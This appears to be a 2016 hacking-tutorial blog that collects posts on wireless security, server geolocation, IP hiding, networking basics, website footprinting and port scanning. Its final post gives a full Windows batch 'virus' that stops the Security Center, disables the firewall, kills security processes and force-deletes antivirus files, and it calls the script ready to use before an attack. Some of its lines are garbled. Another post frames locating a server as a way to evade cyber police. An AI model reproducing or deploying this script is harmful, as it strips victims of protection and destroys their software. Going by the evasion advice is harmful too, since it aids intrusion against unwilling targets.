Thursday, 9 June 2016

Wireless Hacking

Wireless Hacking

Hello Friends, Today we are going to study "Wireless Hacking". Wireless networks are all around , from home to corporate server farms. They make our lives by avoiding physical connectivity to networks via cables while providing guaranteed consistent network connectivity of devices. It is an advantage with a certain danger attached to it . Wireless network are prone to hacking attacks. We will examine a couple of strategies to secure wireless networks to accomplish satisfactory security.


How do Wireless Network Work ?

Before we discuss wireless network security and weakness, we must understand the fundamental radio transmission and the IEEE 820.11 protocol, regularly known as the WLAN protocol. This protocol connects two or more devices within the short range, Using radio signals. to set up a wireless network, you require a wireless access point and a wireless network card for every device to be connected. The access point is also referred as a Hotspot. It consists of a radio transmitter which is used for transmitting and receiving signals, additionally it also contains hardware which converts data signals to radio signals & vice versa.

we can access a wireless network using wireless network enabled device such as a laptop, tablet, smartphones etc. within the transmission range of a wireless point. most of the device have the wireless network option enabled by default.

you can connect to any wireless network if it is not password protected. if it is password protected then you will need the password to gain access.

Wireless network Authentication 

As the wireless network network is open to every body who has a wireless network enabled gadget, most network are now configured with some kind of encryption and authentication mechanisms.

Let's take a look at some of the commonly used wireless authentication techniques.

WEP

WEP is the acronym for wired equivalent privacy. It was developed for IEEE 802.11 WLAN standards. Its objective was to provide data protection similar or equivalent to that provided by wired networks. WEP encrypts the data, When transmitted over the networks to keep it safe.

WEP Weakness

WEP has significant design flaws and vulnerabilities 

  • WEP is based on passwords which makes it vulnerable to dictionary based attacks.
  • WEP uses R encryption algorithm to create stream ciphers. The stream Cipher input is made of an initial value (iv) and a secret key. The length of the initial value (iv) is 24 bits long while the secret key can either be 40 bits or 140 bits long. The total length of both the initial value and secret can either be 64 bits or 128 bits long. The lower possible value of the secret key makes it easy to crack it.
  • Weak initial values combination don't encrypt adequately.
  • Initial values can be reused.

WPA

WPA stands for WI-FI Procted access. It is A security Protocol developed through The WI-FI alliance in response to the weakness found in WEP. It is used to encrypt data on 802.11 WLAN's. It uses higher initial values 48 bits as an alternative to the 24 bits that WEP uses. It uses temporary Keys to encrypt packets.

WPA Weakness

  • The collision avoidance implementation can be broken.
  • It is vulnerable to DoS attacks.
  • Pre-shared keys Use passphrases. Weak passphrases are vulnerable to dictinary based attacks.
If you like my post & my Blog Please Comment and review it 
______________Thank You________________

Finding The location Of a Server

Finding The location Of a Server

Hello Friends, Today i am going to Show to How to Find the location of a Server. This is very Important step in hacking a Server. In a Case you got caught by Cyber Police you can get rid out of the case from the loopholes in Cyber Laws of that country. It will Only happen when you know the Cyber law of that Country this is only possible when you know the location of the server.


  

Pre-requisite

  • A Computer installed with OS
  • Internet Connection 

What is a Web server ?

web server is a computer system that processes requests via HTTP, the basic network protocol used to distribute information on the World Wide Web. The term can refer to the entire system, or specifically to the software that accepts and supervises the HTTP requests.

The primary function of a web server is to store, process and deliver web pages to clients. The communication between client and server takes place using the Hypertext Transfer Protocol (HTTP). Pages delivered are most frequently HTML documents, which may include imagesstyle sheets and scripts in addition to text content.

Steps to Find The Location Of a Server

1- Open Your Web Browser.

2- Search For "www.iplocation.org".

3- "iplocation.org" Looks like This


4- Give the Target Domain or IP Address.


5- Click on IP lookup.

6- It will show you Result Like This.

You can See that It shows the IP Address Of the Target & Country, Region, City .

[Note]
This Tutorial Is Only for Educational Purpose.

If you like my Blog, My Post's Please leave a Comment 
____________________________________Thank You ____________________________________

Tuesday, 31 May 2016

How to Hide IP Address in Android

How to Hide IP Address in Android 

Hello Friends, Today I am Going to show you How to Hide IP Address in Android . We should Hide Our IP address for some Security reasons like :-


  • For Hiding Geographical Location.
  • To Prevent Web Tracking.
  • To avoid Leaving a Digital Footprint.
  • To Bypass Blocked Sites on their IP Address.
This Tutorials Is only for Educational Purpose. I will not Responsible any Damage done to your Android Handset

Introduction


Internet has Become so common these days that most of the people take it for granted. While everyone spends hours on internet, only a few online seems to care about their security When they are Online. Cyber Security has become one of the burning issues in this decade and your security is always in your hand. The small measure we take towards secure browsing will have a huge impact. using strong password, Hiding your IP address are some of the security measure you can follow, while the first one is self explanatory in this article I will show you how you can hide your IP address in your PC and Smartphone 



What Is IP address ?

An Internet Protocol address (IP address) is a numerical label assigned to each device (Computer, Printer) participating in a computer network that uses the Internet Protocol for communication. An IP address serves two principal functions: host or network interface identification and location addressing. Its role has been characterized as follows: "A name indicates what we seek. An address indicates where it is. A route indicates how to get there."

Why you should Hide IP Address ?

You may have your own reasons for hiding your IP Address, but here are a few technical reasons why people hide their public IP Address.

Hiding your IP Address is a good step in Protecting Yourself Online. I don't Want you to think it's Useless, But it's Certainly not the definitive measure that keeps your Online status Anonymous or Protected. 

We should Hide Our IP address for some Security reasons like :-
  • For Hiding Geographical Location.
  • To Prevent Web Tracking.
  • To avoid Leaving a Digital Footprint.
  • To Bypass Blocked Sites on their IP Address.

The only true way to remain anonymous online is to not even connect to the internet. :)

How to Hide IP Address In Android ?

The most Comman way to hide IP and Safe guard your Online identity in an android device is to download and install any VPN app from the Google Play Store. Some of the best VPN application that you can use are given below.
  • Hostspot shield Free VPN Proxy.
  • TunnelBear VPN 
  • Hideman VPN 
  • Tigervpns Free VPN and Proxy.
  • Free & Premium VPN - Finch VPN
  • Betternet Unlimited Free VPN

Friday, 27 May 2016

Basics OF Networking

Basics OF Networking 


What is Network ?

A computer Network or data Network is a Telecommunications Work which allows computers to exchange data. In computer networks, networked computing devices exchange data with each other using a data link. The connections between nodes are established using either cable media or wireless media.

  • Interconnection of two or more devices is called as a Network.
  • The Communication between two or more interconnected devices is called networking.
  • An internetwork is a connection of two or more network.
  • Internetworking means communication between different networks.

Types of Network ?

  • LAN-  Local Area Networks are used to connect networking devices that are in a very close geographic area such as a floor of a building, a building itself or with in a campus.
  • MAN- Metropolitan Area Network are used to connect networking devices that may span around the entire city.
  • WAN- Wide area networks which connects two or more LANs present at different geographical locations.

LAN Network

Man Network


WAN Network

Basic Requirements to Form a Network.

  • NIC ( Network Interface Card ) also called as LAN card.
  • Media 
  • Networking device like ( Hub,Switch,Router etc. )
  • Protocols 
  • Logical Address ( IP Address )

NIC(Network Interface Card)

  • NIC is the interface between the computer and the network.
  • It is also known as the LAN card or Ethernet Card.
  • Ethernet Card have a unique 48 bit address called as MAC (Media access Control) Address. MAC Address is also called as physical address or hardware address. The 48bit MAC address is represented as 12 Hexa-decimal digits. Example :0 0 1 6.D 3 F C. 6 0 3 F
  • Network card are available in Different Speed.
  • Ethernet ( 10 Mbps)
  • Fast Ethernet ( 100 Mbps)
  • Gigabit Ethernet (1000 Mbps)

Media

The purpose of media is to transport bits from one machine to another.

Media Is of 2 type:-
  • Guided 
  • Unguided

Guided media Is also of 3 types :-
  1. Co-axial 
  2. Twisted pair 
  3. Fiber
Unguided Media is of 2 types :-
  1. Infrared 
  2. RF

Types of twisted Pair Cables

Category                                DTR                       Purpose                          Connector

CAT1                                    1 Mbps                  Telephones                            RJ11
CAT2                                    4 Mbps                                                                RJ11
CAT3                                   10 Mbps                 Ethernet                                RJ45
CAT4                                   16 Mbps                                                               RJ45
CAT5                                   100 Mbps               Fast Ethernet                        RJ45
CAT5                                   500 Mbps                                                             RJ45
CAT6                                  1000 Mbps              Gigabit Ethernet                    RJ45

Topology

Topology is a physical layout of the system connected in a network.

Different types of Topology are:
  • Bus
  • Ring
  • Mesh
  • Star

Bus Topology

  • In bus topology all devices are connected to a single cable or backbone.
  • It support half duplex communication.
  • A break at any point along the backbone will result in total network Failure.
Ex:

Ring Topology

  • In Ring topology each computer or device is connected to its neighbor forming a Loop.
  • Failure of a single Device or a break anywhere in the cable cause the full network to stop communicating.
                                                                     Ex:

Mesh Topology

  • In mesh topology each device is directly connected to all other device.
  • The disadvantage is the number of NIC's required on each device and the complex cabling.
Ex:

Start Topology

  • The most commonly used topology.
  • It consist of one centralized device which can be either a switch or a hub.
  • The device connect to the various ports on the centralized devices.
Ex:

Networking Devices 

The various types of Networking Devices are:
  • Hub
  • Switch
  • Router

Hub / Repeater

  • It is not an Intelligent device.
  • It works with bits.
  • Uses broadcast for communication.
  • Bandwidth is shared.
  • Half-duplex communication.
Ex:

Switch

  • It is an Intelligent Device.
  • It maintains MAC address table ( Hardware address )
  • Each port of the switch has fixed bandwidth.
  • It works with flooding and Unicast
  • Supports full duplex communication. 
Ex:

Router

  • It is an Intelligent device.
  • It works with logical addressing (i.e IP, IPX, Apple Talk)
  • It work with Fixed bandwidth. 
Ex:
 If You Like My post Please Review My Blog In Comments .

________________________________Thank You ________________________________

Tuesday, 3 May 2016

How to Find Information of a Website

How to Find Information of a Website

Hello Friends, I am Mahak Bhawsar a Ethical Hacker. I am Back with some New Hacking Tutorials. In this post we are Going to Study How we can Find Information of Website. As u all knows that Foot printing is first step for a Hacker. Foot Printing mean gathering information of our target.



In this Tutorial we Gonna Find Information of Website like :-
  • Its Domain  
  • Its Name server 
  • IP of Server
  • IP of Name Server
  • Its Hosting Company
  • Its Domain Registrar
  • Which Web server they are using 
  • OS of Web server

Pre-requisite

Steps

1. Select the target Website & copy the Domain of the website. Ex www.microsoft.com 
2. Go the www.netcraft.com & paste the domain.


3. After Pasting Domain Click arrow & wait for Result. 
4. You will get Result like this




5. You will get some Information Through this Website & for some more Information we will use a tool called DNS Data View.
6. Download the tool from Internet and Install it.
7. Run the application as Administration.


8. When you start application you will see this Window.


9. Give the target Domain Ex zoomgroup.com & click OK.


10. Wait for some time you will get Result like this.

_________________Thank You_________________


How to Find Available Ports on a IP

How to Find Available Ports on a IP

Hello Friends, Today we are going to Find the Available pots On a IP. This is most important step for hacking a Web Server. After doing this we are able to see What services are On on a IP.


What are Ports ?

In programming, a port is a "logical connection place" and specifically, using the Internet's protocol, TCP/IP, the way a client program specifies a particular server program on a computer in a network.

A port is always associated with an IP address of a host and the protocol type of the communication and thus completes the destination or origination address of a communication session. A port is identified for each address and protocol by a 16-bit number, commonly known as the port number.

Specific port number are often used to identify specific services. Of the thousand of enumerated ports, 1024 well-known port number are reserved by convention to identify specific service type on a host. The protocol that primarily use ports are the transport layer protocol, such as the transmission Control Protocol (TCP) and the user Datagram prot (UDP) of the Internet protocol suite.

Pre-requisite


Steps :-

1. Select an Target IP which you want to Scan.
2. Download & Install Advance Port Scanner Tool.
3. Run Advance Port Scanner Tool as Administrator you will Find Tool in start menu after Installation.



4. After Opening Tool you will Get this Window. This Window is for Scanning range of IP's if you want to Scan only One IP Please Un-check Use range option.


5. After Un-checking Use range option you will get this Window.


6. Give the target IP & click on Scan Option to start Scanning.


7. It shows Scanning in bottom. We have to wait for some time.
8. After Scanning It shows Result like this.

If you like My Blog-Spot, My Tutorials Please give me your Feed Back as a Comment.
___________________Thank You___________________

Monday, 2 May 2016

Virus That kill Anti-Virus

Virus That kill Anti-Virus

Hello Friends, Today we are going to make a virus which will kill or disable the Anti-virus. This will be very Help full when we are going to attack prior attack we just have to execute the virus this will disable the Anti-virus & we have more chances for making our attack successful.

Warning

Please don't try to run this Virus on your computer it can harm your computer. I will not be Responsible for any damage done to your Computer. This virus is only for Education purpose. Please don't use it with wrong purpose.

What is Anti-Virus

Antivirus or anti-virus software, sometimes known as anti-malware software, is computer software used to prevent, detect and remove malicious software.
Antivirus software was originally developed to detect and remove computer viruses, hence the name. However, with the proliferation of other kinds of malware, antivirus software started to provide protection from other computer threats. In particular, modern antivirus software can protect from: malicious Browser Helper Objects (BHOs), browse, Virus, Trojan, Root Kits.

What id Killing Anti-virus ?

Killing Anti-virus mean Disabling the Anti-virus. Which mean after killing our antivirus will not run. and our computer is not protected.

Pre-requisite

  • Computer Installed with OS
  • Notepad

Steps to Create Virus

1. Go to the Start.
2. Open Notepad
3. Copy & paste the code given below.

____________CODE____________
@ echo off
rem —
rem RIP Anti Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files
ood32krn\*.exe
del /Q /F C:\Program Files
ood32\*.exe
cls
del /Q /F C:\Program Files
od32
del /Q /F C:\Program Files
ood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem —
____________________________________________

5. Save the File with ".bat" Extension.
6. Now your Virus is ready to use.


[NOTE] Please don't try to run this Virus on your computer it can harm your computer. I will not be Responsible for any damage done to your Computer. This virus is only for Education purpose. Please don't use it with wrong purpose.

___________________________________Thank You___________________________________